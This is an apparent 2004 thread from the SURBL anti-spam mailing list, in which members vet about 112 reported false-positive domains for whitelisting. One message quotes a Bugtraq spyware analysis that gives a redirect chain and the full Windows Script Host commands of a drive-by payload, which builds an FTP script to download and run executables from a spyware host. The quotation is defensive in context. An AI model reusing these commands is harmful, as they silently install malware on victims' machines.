Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
123inkjets.com 1and1.com 1sound.com 4d.com 65.17.207.40 69.50.139.61 8k.com aaronsw.com achtungachtung.com activatormail.com addictivetechnologies.net aec.at agnitum.com aladdinsys.com amnesty-volunteer.org ampcast.com apple.ru atstake.com barebones.com bbspot.com bis1bp.com bridgingthegapforhealthcare.org classesusa.com clearcredit.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com default-homepage-network.com design-tools.com dontspyon.us drbott.com drivesavers.com drorshalev.com duckland.org ecsirt.net faithfulamerica.org fetchsoftworks.com fipr.org firearmsandliberty.com firepaige.org firewiredirect.com flingstone.com forest.net geoffmetcalf.com globat.com gotomypc.com guninski.com hasbrouck.org hiramoto.org hnc3k.com imgfarm.com imrsvcs.com inderjeetsodhi.com joegratz.net karelia.com lacie.com lacipeterson.com m-w.com macsales.com mail15.com maliasoft.com moveon.org mutemail.com mysurvey.com navi.cx news-miner.com ourfuture.org oxsemi.com passthison.com pcpitstop.com pivx.com pivxlabs.com popmoney.net port5.com postarmor.com prosoftengineering.com qwik-fix.net ravantivirus.com redhawk.org redlers.com reunion.com safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
Jeff C.
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
Can we divide these up to check?
Jeff C.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Jeff Chan writes:
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
fwiw, aaronsw.com is white-hat -- it's Aaron Swartz' personal domain, and is used (afaik) for person-to-person mail only -- specifically, Aaron-to-person. ;)
if that's listed, it's definitely an FP. Aaron is not a spammer. ;)
- --j.
On Monday, September 6, 2004, 9:10:22 PM, Justin Mason wrote:
Jeff Chan writes:
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
fwiw, aaronsw.com is white-hat -- it's Aaron Swartz' personal domain, and is used (afaik) for person-to-person mail only -- specifically, Aaron-to-person. ;)
if that's listed, it's definitely an FP. Aaron is not a spammer. ;)
That's one that's not on any lists. Probably it was in one of Theo's hams that had a different FP hit in the same message.
Jeff C.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
FWIW there were another 65 or so domains I extracted from Theo's hams that I did not include in that FP list because they were already in whitelists. In other words they probably would have been non-hits, unless they were whitelisted recently.
Jeff C.
Jeff Chan wrote to SURBL Discussion list:
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards, Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
Sure.
http://ry.ca/geturi/1-f.html <-- I'll take these http://ry.ca/geturi/g-r.html <-- Jeff? http://ry.ca/geturi/s-z.html <-- Joseph
- Ryan
http://ry.ca/geturi/s-z.html <-- Joseph
Mine's got them all :|
No worries on that will get started shortly.
Regards,
Joseph
On Monday, September 6, 2004, 9:37:21 PM, Ryan Thompson wrote:
http://ry.ca/geturi/1-f.html <-- I'll take these http://ry.ca/geturi/g-r.html <-- Jeff? http://ry.ca/geturi/s-z.html <-- Joseph
- Ryan
Sounds good. I've got g through r Thanks!
Jeff C.
All domains in "g through r" except quik-fix.com are two or more years old. Several are nearly 10 years old. The computer security hits probably came from a security newsletter. The political sites came from political newsletter(s), all subscribed. Also appears to be and Apple/MacIntosh mailing list.
geoffmetcalf.com - political commentary globat.com - web host, probably gets abused, but mostly legit gotomypc.com - legit remote PC operation software guninski.com - computer security site hasbrouck.org - author "The Practical Nomad" unlikely pro spammer hiramoto.org - Hiramoto Family Website hnc3k.com - hacking and cracking, arguably legit security interest imgfarm.com - iwon.com, akamai hosting, a bit grey, probably legit imrsvcs.com - Electronic Data Systems Corporation, huge IT company inderjeetsodhi.com - personal web site of IT consultant joegratz.net - personal site of law student, unlikely spam site karelia.com - Mac software company lacie.com - major manufacturer of hard, cd, dvd drives lacipeterson.com - crime victim personal site m-w.com - 150+ year old dictionary company macsales.com - apple computer shop mail15.com - site of "trappers" a bugtraq security contributor maliasoft.com - antispam software moveon.org - political mutemail.com - Secure Anonymous Email Services, probably legit mysurvey.com - survey site, 60 year old company, unlikely major spammers navi.cx - makes system for tracking open-source projects news-miner.com - newspaper in Alaska, probably not major spammers ourfuture.org - political oxsemi.com - Oxford Semiconductor - Chips for MPEG, Firewire... passthison.com ============= removed from list, spyware destination pcpitstop.com - pc tuneup, virus, spyware, adware awareness pivx.com - computer security company pivxlabs.com - computer security company popmoney.net =============== removed from list, spyware destination port5.com - free web hosting, open proxy list security list mention postarmor.com - antispam software prosoftengineering.com - Netware Mac client for OS 10 qwik-fix.net - computer security company ravantivirus.com - antivirus company redhawk.org - open source software project redlers.com - word processor for Mac OS X reunion.com - people finder site, probably abused, mostly legit
In summary, all are mostly legitimate, and so are the ones Ryan and Joseph researched. Therefore I am whitelisting all of the SURBL-wide FPs we got from Theo, minus the ones I deleted from that spyware message. The resulting list, plus some already whitelisted like apple.com and google.com, etc. is at:
http://spamcheck.freeapp.net/whitelists/theo-set1.sort
If anyone has any objections or spots any obvious major spammers, please let us know.
Thanks for the help, Theo, Joseph, Ryan and others.
Jeff C.
OK. Here's my recommendations on the 1-f bunch, assuming these did hit real ham. Descriptions preceded by FP indicate domains that are listed in multi.surbl.org (in the FP list generated by geturi). I don't think I missed any.
123inkjets.com 158 NANAS reports that look spammy as hell, but they've been around for years. Good greylist candidate?
1and1.com 1and1 Internet. Most NANAS reports are just nameserver hits. Definitely legit users.
1sound.com Can't resolve domain, but no real NANAS hits, and has been registered for 4+ years. Domain servers appear to be unresponsive.
4d.com Registered in '93, CAD software package
8k.com FP: Free web space
aaronsw.com JM knows
activatormail.com FP: Looks white-hat to me; 4+ years of email service, looks like users sometimes spam. Should not be listed in SURBL.
agnitum.com FP: 4+ years; make firewall software. NANAS hits look bogus. No way this should be listed in SURBL.
aladdinsys.com On the net since '94; they make compression software
amnesty-volunteer.org The domain is 2517 days old, and looks like the site isn't much younger. :-) More importantly, no NANAS hits, and they look rather legit.
ampcast.com atstake.com barebones.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com design-tools.com drbott.com drivesavers.com These all look legit to me, no damning NANAS reports, and domains registered for > 2 years. I couldn't find any evidence of spam for any of them.
bbspot.com FP: One of my favourite sites. :-) More importantly, they don't spam. Whitelist.
classesusa.com One NANAS example, possibly forged. Maybe not whitelist. Registered for 4+ years.
clearcredit.com FP: Many NANAS examples, but all are over a year old. The site has a new owner as of March 2004. I'd say de-list and see what happens.
drorshalev.com Looks like a personal site, and it's been registered since last year and I couldn't find any evidence of spamming.
duckland.com Personal site, no NANAS, around for years
ecsirt.net Doesn't resolve; no nameservers. Also, no NANAS. Reg'd in 2002
fetchsoftworks.com Looks legit enough to me
fipr.org Old and well-known organization; no history of spam
firewiredirect.com One NANAS hit that was probably someone who forgot they subscribed to the newsletter. :-)
forest.net Hosting and co-location. Definitely legit.
So, to summarize, all of these should at *least* be de-listed, and, with a few exceptions, they're all potential whitelist candidates.
- Ryan
Jeff Chan wrote to SURBL Discussion list:
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
FWIW there were another 65 or so domains I extracted from Theo's hams that I did not include in that FP list because they were already in whitelists. In other words they probably would have been non-hits, unless they were whitelisted recently.
Jeff C.
Discuss mailing list Discuss@lists.surbl.org http://lists.surbl.org/mailman/listinfo/discuss
Ryan Thompson wrote to SURBL Discussion list:
I don't think I missed any.
Ha! *somebody* needs a nap. I only forgot to look at the first third of my list or so. :-)
bis1bp.com FP: Hmm... Domain doesn't resolve thanks to their not being any authoritative nameservers. It's 87 days old. If this was really found in ham, I'd say de-list.
aec.at Looks legit
apple.ru Apple division in Russia
bridgingthegapforhealthcare.org FP: Aside from winning the Longest Domain in the List Contest, I don't see any evidence of spam.
faithfulamerica.org Couldn't find any evidence of spam
firepaige.org FP: Political campaign site. Any spam they send would be kind of iffy to begin with, and the only NANAS example wasn't even directly related to them.
addictivetechnologies.net
achtungachtung.com I need help with this one. "Our state of the art software delivers targeted advertising to millions of web users based on geography, language, time, etc..."
default-homepage-network.com Heh. "Due to new laws being enacted and controversy surrounding our business model, we have voluntarily decided to implement the cease of all current business practices by the end of June 2004."
firearmsandliberty.com dontspyon.us Couldn't find any spam reports, but they're more US policital sites.
flingstone.com "XML search feed provider". No NANAS reports.
- Ryan
My bad, I inadvertently included a message which was about trojan-like spyware, which is publically avialable at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on what registry branch lead you there. This serves to notify default-homepage-network whether your machine has been compromised with user or administrator privileges
start.cgi also opens a few popup windows with advertisements, after which it opens the following page=20
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi http://69.50.139.61/hp1/hp1.htm http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows Script Host object:
wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6); wsh.Run('command /C echo tmpacct>>o',false,6); wsh.Run('command /C echo 12345>>o',false,6); wsh.Run('command /C echo bin>>o',false,6); wsh.Run('command /C echo get install2.exe>>o',false,6); wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6); wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6); wsh.Run('command /C echo get CS4P028.exe>>o',false,6); wsh.Run('command /C echo bye>>o',false,6); wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6); wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe http://validation-required.info/ http://www.popmoney.net/ip/index.php http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domais out of the possible whitelist.
Jeff C.
On Monday, September 6, 2004, 11:36:28 PM, Jeff Chan wrote:
My bad, I inadvertently included a message which was about trojan-like spyware, which is publically avialable at:
sigh, sending all those bad guy domains appears to have caused some subscribers to this list messages to bounce, and mailman to remove them because of it... :-(
Jeff C.
On Monday, September 6, 2004, 11:10:50 PM, Ryan Thompson wrote:
bis1bp.com FP: Hmm... Domain doesn't resolve thanks to their not being any authoritative nameservers. It's 87 days old. If this was really found in ham, I'd say de-list.
I found this one in the original message and it's part of a security mailing list mention of a phishing site. Removing from whitelist.
http://seclists.org/lists/bugtraq/2004/Jun/0268.html
It no longer resolves but should be fine to block on IMO.
Jeff C.
Jeff Chan wrote to SURBL Discuss:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
- Ryan
Ryan Thompson wrote to SURBL Discussion list:
Jeff Chan wrote to SURBL Discuss:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
First-pass no-brainers:
m-w.com bbspot.com userfriendly.org seti.org 8k.com 4d.com wpi.edu yale.edu uoregon.edu uophx.edu
(is there any reason why .edu domains should *ever* be listed in SURBL? Should we whitelist the whole of .edu?)
- Ryan
On Monday, September 6, 2004, 9:20:23 PM, Ryan Thompson wrote:
Ryan Thompson wrote to SURBL Discussion list:
Jeff Chan wrote to SURBL Discuss: Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
First-pass no-brainers:
m-w.com bbspot.com userfriendly.org seti.org 8k.com 4d.com wpi.edu yale.edu uoregon.edu uophx.edu
(is there any reason why .edu domains should *ever* be listed in SURBL? Should we whitelist the whole of .edu?)
- Ryan
Thanks.
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
Some folks felt that kaplan.edu spammed them, but given the potential for legitmate use and therefore collateral damage from false positives, we really can't list it.
Jeff C.
On Monday, September 6, 2004, 9:31:31 PM, Jeff Chan wrote:
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
But instead of whitelisting an entire TLD we can try to let the data speak for itself. There are very few spam reports on those TLDs, so in a sense it takes care of itself.
Jeff C.
On Mon, 6 Sep 2004, Jeff Chan wrote:
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
Some folks felt that kaplan.edu spammed them, but given the potential for legitmate use and therefore collateral damage from false positives, we really can't list it.
Jeff C.
More to the point, Kaplan College hired a spamhaus (ie-express.com) (SBL #SBL15843)to do a spam campaign for them.
One of my spamtraps collected multiple hits from them. (The target address was only used in a 'mailto:' on a web page, spiders harvested it).
I was particularly amused by the rationalization paragraph in that message:
You have received this advertisement because you signed up to receive offers from ie-express.com and/or through one of our affiliate partners. You signed up at 10/08/03 14:26:54 on 216.116.242.73 with the following IP address 5106541715. Any correspondence about the products/services advertised should be directed to the company in the ad. Our privacy policy can be found here: http://ie-express.com/fa_privacypolicy.php
(full spam example available upon request ;)
Kaplan College -is- a legit business, but if they can resort to hiring spammers with impunity they will only add to the spam problem. (It is an economic issue, as long as spammers can do their 'biziness' with little cost and make money they will only increase).
Looks good. Did not see the heuristic details documented, but one thing I would definitely suggest adding is spamhaus lookups on the resolved www and base domain and on the domain NS records. I find that a strong correlator of spam, though of course no source is perfect. For example:
antispam: [198]% ns savingzplus.biz Server: localhost.freeapp.net Address: 127.0.0.1
Name: savingzplus.biz Address: 219.147.198.131
antispam: [199]% ns www.savingzplus.biz Server: localhost.freeapp.net Address: 127.0.0.1
Name: www.savingzplus.biz Address: 219.147.198.131
(where ns is nslookup)
antispam: [202]% dig 131.198.147.219.sbl-xbl.spamhaus.org a
; <<>> DiG 8.3 <<>> 131.198.147.219.sbl-xbl.spamhaus.org a ;; res options: init recurs defnam dnsrch ;; got answer:
;; ->>>HEADER<<- opcode: QUERY, status: NOERROR, id: 20797
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 13, ADDITIONAL: 14 ;; QUERY SECTION: ;; 131.198.147.219.sbl-xbl.spamhaus.org, type = A, class = IN
;; ANSWER SECTION: 131.198.147.219.sbl-xbl.spamhaus.org. 1h59m53s IN A 127.0.0.2
Bingo! Probably a bad guy.
Jeff C.
On Mon, Sep 06, 2004 at 08:43:10PM -0700, Jeff Chan wrote:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Heh. I can't wait to see what my full corpus shows (I think the last list I sent over was most of the ham messages). ;)
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I'll leave that up to you folks, but here's my thoughts.
For most of the listed domains, I have no idea who they are. The ones I recognize off-hand are below, FWIW.
amnesty-volunteer.org atstake.com barebones.com drbott.com duckland.org firepaige.org lacie.com m-w.com macsales.com moveon.org ourfuture.org oxsemi.com reunion.com salary.com saturnevents.com seti.org smalldog.com snopes.com tidbits.com userfriendly.org wlug.org wpi.edu yale.edu
Jeff,
I think I got them all.
safecenter.net - LEGIT Created on: 07-SEP-02 Home security site. NANAS 0
salary.com - LEGIT created on 31-Dec-1995 The NANAS hits seem to be mainly for spammers mentioning them in spam. There is a couple of spams from 02 which have mail2.salary.com as the relay, however it doesn't lookup to that IP now, if indeed it ever did. NANAS 20
saturnevents.com - LEGIT Created on 2000-May-08 Registered to General Motors NANAS 0
secnetops.com - LEGIT Created on: 04-FEB-03 Security services & products NANAS 0
seti.org - LEGIT Created On:31-Oct-1995 The SETI Institute, been around a long time. NANAS 0
smalldog.com - LEGIT created on 06-Mar-1998 Apple retailer/online shop. They appear to have advertised in some newletters that may have been spam. Also appear in the tidbits.com (domain below) newsletter. NANAS 3
snopes.com - LEGIT created on 09-Jan-1997 One of the first internet urbanlegends pages, everybody knows them Other than the yuk pops ups and 10000 smiley faces they are legit. NANAS 122
soundclick.com - LEGIT created on 13-Aug-1997 Music site - has a few spammy type popups. The only nanas report would suggest that a band or user of their service sent a spam promoting their Band. NANAS 1
spywareinfo.com - LEGIT Created on: 25-Oct-01 Looking around it appears to be a legit site, website is down from here at the moment, can't check any more. NANAS 4
tex-edit.com - LEGIT created on April 08, 2001 Scripts and stuff for MACs NANAS 0
the-livingstons.org - LEGIT Created On:06-Jan-2003 Someones personal website NANAS 0
tidbits.com - LEGIT created on 04-May-1992 MAC newsletter type place. NANAS 7
ukclimbing.com - LEGIT created on 03-Sep-1998 A climbing website funny enough :-) NANAS 0
uophx.edu - LEGIT
uoregon.edu - LEGIT
userfriendly.org Created on 04-Aug-1998 Geek cartoon, like who doesn't subscribe to this?? :P NANAS 3
virusall.com - LEGIT Created on 14 Dec 2001 Information about viruses & hoaxes NANAS 0
westdam.com - LEGIT Created on: 03-Jan-02 Offer various free internet services NANAS 0
wiebetech.com - LEGIT Created on 11-Jul-2000 Hosted by Yahoo Storage solutions NANAS 0
wireless-starter-kit.com - LEGIT Created on 21-Oct-2002 Wireless networking book NANAS 0
wlug.org - LEGIT Created On:30-Nov-1999 Worcester Linux Users Group NANAS 0
worldwidemart.com - LEGIT Creation date: 28 Jul 1995 Used to be Matts script archive, now at www.scriptarchive.com Matt had a popular formmail script full of holes, that's possibly why it appears in a fair few NANAS hits. Now the domain is used by a webhoster. NANAS 49
wpi.edu - LEGIT
wsacorp.com - LEGIT Created on: 26-Jun-03 Career Marketers - Partners with Wall Street Journal and more Their legit domain has been listed in spams, ie. our spam service is as good as these guys... NANAS 2
yale.edu - LEGIT
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Hi Jeff!
mysurvey.com:
I received spam from listmaster@theemailer.com advertising mysurvey.com and frus-onket.com on May 19, 2004 and listed the domains. However, just checking now some people seem to subscribe to mysurvey.com. Another one for the greylist...
achtungachtung.com:
This site is listed on many websites as hosting components of spyware. Trojan "Troj/Achtung-A" downloads a file from their site. I don't know if the site is mentioned in any spam.
The following are on my local whitelist:
1and1.com mail15.com moveon.org yale.edu
Joe
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
123inkjets.com 1and1.com 1sound.com 4d.com 65.17.207.40 69.50.139.61 8k.com aaronsw.com activatormail.com addictivetechnologies.net aec.at agnitum.com aladdinsys.com amnesty-volunteer.org ampcast.com apple.ru atstake.com barebones.com bbspot.com bis1bp.com bridgingthegapforhealthcare.org classesusa.com clearcredit.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com default-homepage-network.com design-tools.com dontspyon.us drbott.com drivesavers.com drorshalev.com duckland.org ecsirt.net faithfulamerica.org fetchsoftworks.com fipr.org firearmsandliberty.com firepaige.org firewiredirect.com flingstone.com forest.net geoffmetcalf.com globat.com gotomypc.com guninski.com hasbrouck.org hiramoto.org hnc3k.com imgfarm.com imrsvcs.com inderjeetsodhi.com joegratz.net karelia.com lacie.com lacipeterson.com m-w.com macsales.com mail15.com maliasoft.com moveon.org mutemail.com mysurvey.com navi.cx news-miner.com ourfuture.org oxsemi.com passthison.com pcpitstop.com pivx.com pivxlabs.com popmoney.net port5.com postarmor.com prosoftengineering.com qwik-fix.net ravantivirus.com redhawk.org redlers.com reunion.com safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
Jeff C.
Jeff Chan mailto:jeffc@surbl.org http://www.surbl.org/
Discuss mailing list Discuss@lists.surbl.org http://lists.surbl.org/mailman/listinfo/discuss
On Tuesday, September 7, 2004, 12:21:59 AM, Joe Wein wrote:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Hi Jeff!
mysurvey.com:
I received spam from listmaster@theemailer.com advertising mysurvey.com and frus-onket.com on May 19, 2004 and listed the domains. However, just checking now some people seem to subscribe to mysurvey.com. Another one for the greylist...
achtungachtung.com:
This site is listed on many websites as hosting components of spyware. Trojan "Troj/Achtung-A" downloads a file from their site. I don't know if the site is mentioned in any spam.
The following are on my local whitelist:
1and1.com mail15.com moveon.org yale.edu
Joe
Thanks much Joe. I excluded some domains that were mentioned in a spyware message. auchtung.... was one of them.
Appreciate the feedback about the others. Was trying to figure out mail15.com....
Jeff C.
-
David B Funk -
Jeff Chan -
jm@jmason.org -
Joe Wein -
Joseph Burford -
Ryan Thompson -
Theo Van Dinter